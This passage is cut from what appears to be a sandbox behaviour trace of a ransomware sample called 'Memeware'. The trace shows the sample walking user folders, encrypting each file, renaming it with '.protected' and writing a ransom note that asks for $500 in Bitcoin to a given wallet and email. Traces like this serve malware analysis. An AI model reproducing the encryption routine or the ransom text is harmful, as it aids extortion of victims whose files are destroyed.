HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\.") returned 71 [0090.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.393] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\..") returned 72 [0090.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.393] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.393] StrStrIW (lpFirst="Normal.dotm", lpSrch=".protected") returned 0x0 [0090.393] lstrcmpW (lpString1="Normal.dotm", lpString2="RESTORE_FILES.txt") returned -1 [0090.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".txt") returned 0x0 [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".rar") returned 0x0 [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".zip") returned 0x0 [0090.394] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.404] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.404] CloseHandle (hObject=0x14c) returned 1 [0090.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.protected") returned 91 [0090.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.protected")) returned 1 [0090.405] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.405] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.405] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\RESTORE_FILES.txt") returned 87 [0090.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.406] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.406] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.407] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.407] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.407] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.407] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.407] CloseHandle (hObject=0xd8) returned 1 [0090.407] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Windows") returned -1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Program Files") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Program Files (x86)") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="$Recycle.bin") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="System Volume Information") returned 1 [0090.407] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned 66 [0090.407] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0090.407] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0090.407] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned 68 [0090.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.408] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\.") returned 68 [0090.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\..") returned 69 [0090.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.408] StrStrIW (lpFirst="CUSTOM.DIC", lpSrch=".protected") returned 0x0 [0090.408] lstrcmpW (lpString1="CUSTOM.DIC", lpString2="RESTORE_FILES.txt") returned -1 [0090.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.409] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".txt") returned 0x0 [0090.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.409] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".rar") returned 0x0 [0090.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.410] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".zip") returned 0x0 [0090.410] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0090.410] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.410] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0090.410] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.410] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.411] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.411] CloseHandle (hObject=0x14c) returned 1 [0090.411] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.protected") returned 87 [0090.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.protected")) returned 1 [0090.411] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.411] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.411] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\RESTORE_FILES.txt") returned 84 [0090.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.412] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.412] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.412] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.412] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.413] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.413] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.413] CloseHandle (hObject=0xd8) returned 1 [0090.413] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.413] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0090.413] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Windows") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Program Files") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Program Files (x86)") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="$Recycle.bin") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="System Volume Information") returned 1 [0090.413] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned 64 [0090.413] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0090.413] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0090.413] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*") returned 66 [0090.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.416] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.416] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.416] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\.") returned 66 [0090.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.416] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.416] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.416] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\..") returned 67 [0090.416] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.416] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.416] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.416] lstrcmpiW (lpString1="STARTUP", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="Program Files") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="Program Files (x86)") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="System Volume Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 72 [0090.417] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0090.417] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned 74 [0090.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.") returned 74 [0090.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.417] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, 